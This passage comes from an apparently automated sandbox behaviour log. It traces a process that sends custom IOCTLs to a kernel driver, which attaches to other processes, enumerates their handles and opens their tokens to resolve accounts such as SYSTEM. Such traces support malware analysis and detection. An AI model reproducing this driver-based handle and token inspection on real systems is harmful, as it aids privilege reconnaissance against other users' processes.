Object=0xfffff8a001abf190, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.570] ObfDereferenceObject (Object=0xfffff8a001abf190) returned 0x2 [0245.570] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.570] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.570] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x11c, lpOverlapped=0x0) returned 1 [0245.570] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.570] PsAcquireProcessExitSynchronization () returned 0x0 [0245.570] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.570] ObReferenceObjectByHandle (in: Handle=0x1380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002806070, HandleInformation=0x0) returned 0x0 [0245.570] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.570] PsReleaseProcessExitSynchronization () returned 0x2 [0245.570] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.570] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.570] ObfDereferenceObject (Object=0xfffffa8002806070) returned 0x1 [0245.570] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.570] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.570] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x138, lpOverlapped=0x0) returned 1 [0245.571] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.571] PsAcquireProcessExitSynchronization () returned 0x0 [0245.571] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.571] ObReferenceObjectByHandle (in: Handle=0x1384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001aebe00, HandleInformation=0x0) returned 0x0 [0245.571] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.571] PsReleaseProcessExitSynchronization () returned 0x2 [0245.571] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.571] ObQueryNameString (in: Object=0xfffff8a001aebe00, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.571] ObfDereferenceObject (Object=0xfffff8a001aebe00) returned 0x2 [0245.571] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.571] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.571] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x47c) returned 0xc8 [0245.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.571] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003755060, HandleInformation=0x0) returned 0x0 [0245.571] ObOpenObjectByPointer (in: Object=0xfffffa8003755060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.571] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x42 [0245.571] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.571] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.571] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.571] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.571] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.573] CloseHandle (hObject=0xc4) returned 1 [0245.573] CloseHandle (hObject=0xc8) returned 1 [0245.574] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.574] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.574] PsAcquireProcessExitSynchronization () returned 0x0 [0245.574] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880053c85d0) [0245.574] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003780230, HandleInformation=0x0) returned 0x0 [0245.574] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.574] PsReleaseProcessExitSynchronization () returned 0x2 [0245.574] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x40 [0245.574] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.574] ObfDereferenceObject (Object=0xfffffa8003780230) returned 0x1 [0245.574] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.574] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.574] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.574] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.574] PsAcquireProcessExitSynchronization () returned 0x0 [0245.574] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880053c85d0) [0245.574] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037be070, HandleInformation=0x0) returned 0x0 [0245.574] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.574] PsReleaseProcessExitSynchronization () returned 0x2 [0245.574] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x40 [0245.574] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.574] ObfDereferenceObject (Object=0xfffffa80037be070) returned 0x1 [0245.575] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.575] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.575] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.575] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.575] PsAcquireProcessExitSynchronization () returned 0x0 [0245.575] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880053c85d0) [0245.575] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80023549d0, HandleInformation=0x0) returned 0x0 [0245.575] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.575] PsReleaseProcessExitSynchronization () returned 0x2 [0245.575] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x40 [0245.575] ObQueryNameString (in: Object=0xfffffa80023549d0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.575] ObfDereferenceObject (Object=0xfffffa80023549d0) returned 0x1 [0245.575] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.575] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0245.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.575] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80037e1060, HandleInformation=0x0) returned 0x0 [0245.575] ObOpenObjectByPointer (in: Object=0xfffffa80037e1060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.576] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0245.576] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.576] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.576] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.576] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.576] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.577] CloseHandle (hObject=0xc4) returned 1 [0245.577] CloseHandle (hObject=0xc8) returned 1 [0245.577] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.577] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.578] PsAcquireProcessExitSynchronization () returned 0x0 [0245.578] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.578] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037cd370, HandleInformation=0x0) returned 0x0 [0245.578] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.578] PsReleaseProcessExitSynchronization () returned 0x2 [0245.578] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.578] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.578] ObfDereferenceObject (Object=0xfffffa80037cd370) returned 0x1 [0245.578] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.578] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.578] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.578] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.578] PsAcquireProcessExitSynchronization () returned 0x0 [0245.578] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.578] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037ca070, HandleInformation=0x0) returned 0x0 [0245.578] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.578] PsReleaseProcessExitSynchronization () returned 0x2 [0245.578] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.578] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.578] ObfDereferenceObject (Object=0xfffffa80037ca070) returned 0x1 [0245.578] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.578] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.578] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.578] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.578] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.578] PsAcquireProcessExitSynchronization () returned 0x0 [0245.578] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.579] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003854510, HandleInformation=0x0) returned 0x0 [0245.579] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.579] PsReleaseProcessExitSynchronization () returned 0x2 [0245.579] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.579] ObQueryNameString (in: Object=0xfffffa80027af4e0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.579] ObfDereferenceObject (Object=0xfffffa8003854510) returned 0x1 [0245.579] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.579] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.579] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.579] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.579] PsAcquireProcessExitSynchronization () returned 0x0 [0245.579] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.579] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003855730, HandleInformation=0x0) returned 0x0 [0245.579] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.579] PsReleaseProcessExitSynchronization () returned 0x2 [0245.579] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.579] ObQueryNameString (in: Object=0xfffffa80027af4e0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.579] ObfDereferenceObject (Object=0xfffffa8003855730) returned 0x1 [0245.579] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.579] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.579] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0245.579] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.579] PsAcquireProcessExitSynchronization () returned 0x0 [0245.579] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.579] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038504b0, HandleInformation=0x0) returned 0x0 [0245.579] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.579] PsReleaseProcessExitSynchronization () returned 0x2 [0245.580] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.580] ObQueryNameString (in: Object=0xfffffa80027acc70, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.580] ObfDereferenceObject (Object=0xfffffa80038504b0) returned 0x1 [0245.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0245.580] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.580] PsAcquireProcessExitSynchronization () returned 0x0 [0245.580] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.580] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003851070, HandleInformation=0x0) returned 0x0 [0245.580] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.580] PsReleaseProcessExitSynchronization () returned 0x2 [0245.580] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.580] ObQueryNameString (in: Object=0xfffffa80027b0e40, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.580] ObfDereferenceObject (Object=0xfffffa8003851070) returned 0x1 [0245.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.580] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.580] PsAcquireProcessExitSynchronization () returned 0x0 [0245.580] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.580] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003850070, HandleInformation=0x0) returned 0x0 [0245.580] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.580] PsReleaseProcessExitSynchronization () returned 0x2 [0245.580] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0245.580] ObQueryNameString (in: Object=0xfffffa80027af2c0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.580] ObfDereferenceObject (Object=0xfffffa8003850070) returned 0x1 [0245.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.581] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.581] PsAcquireProcessExitSynchronization () returned 0x0 [0245.581] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0245.581] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, 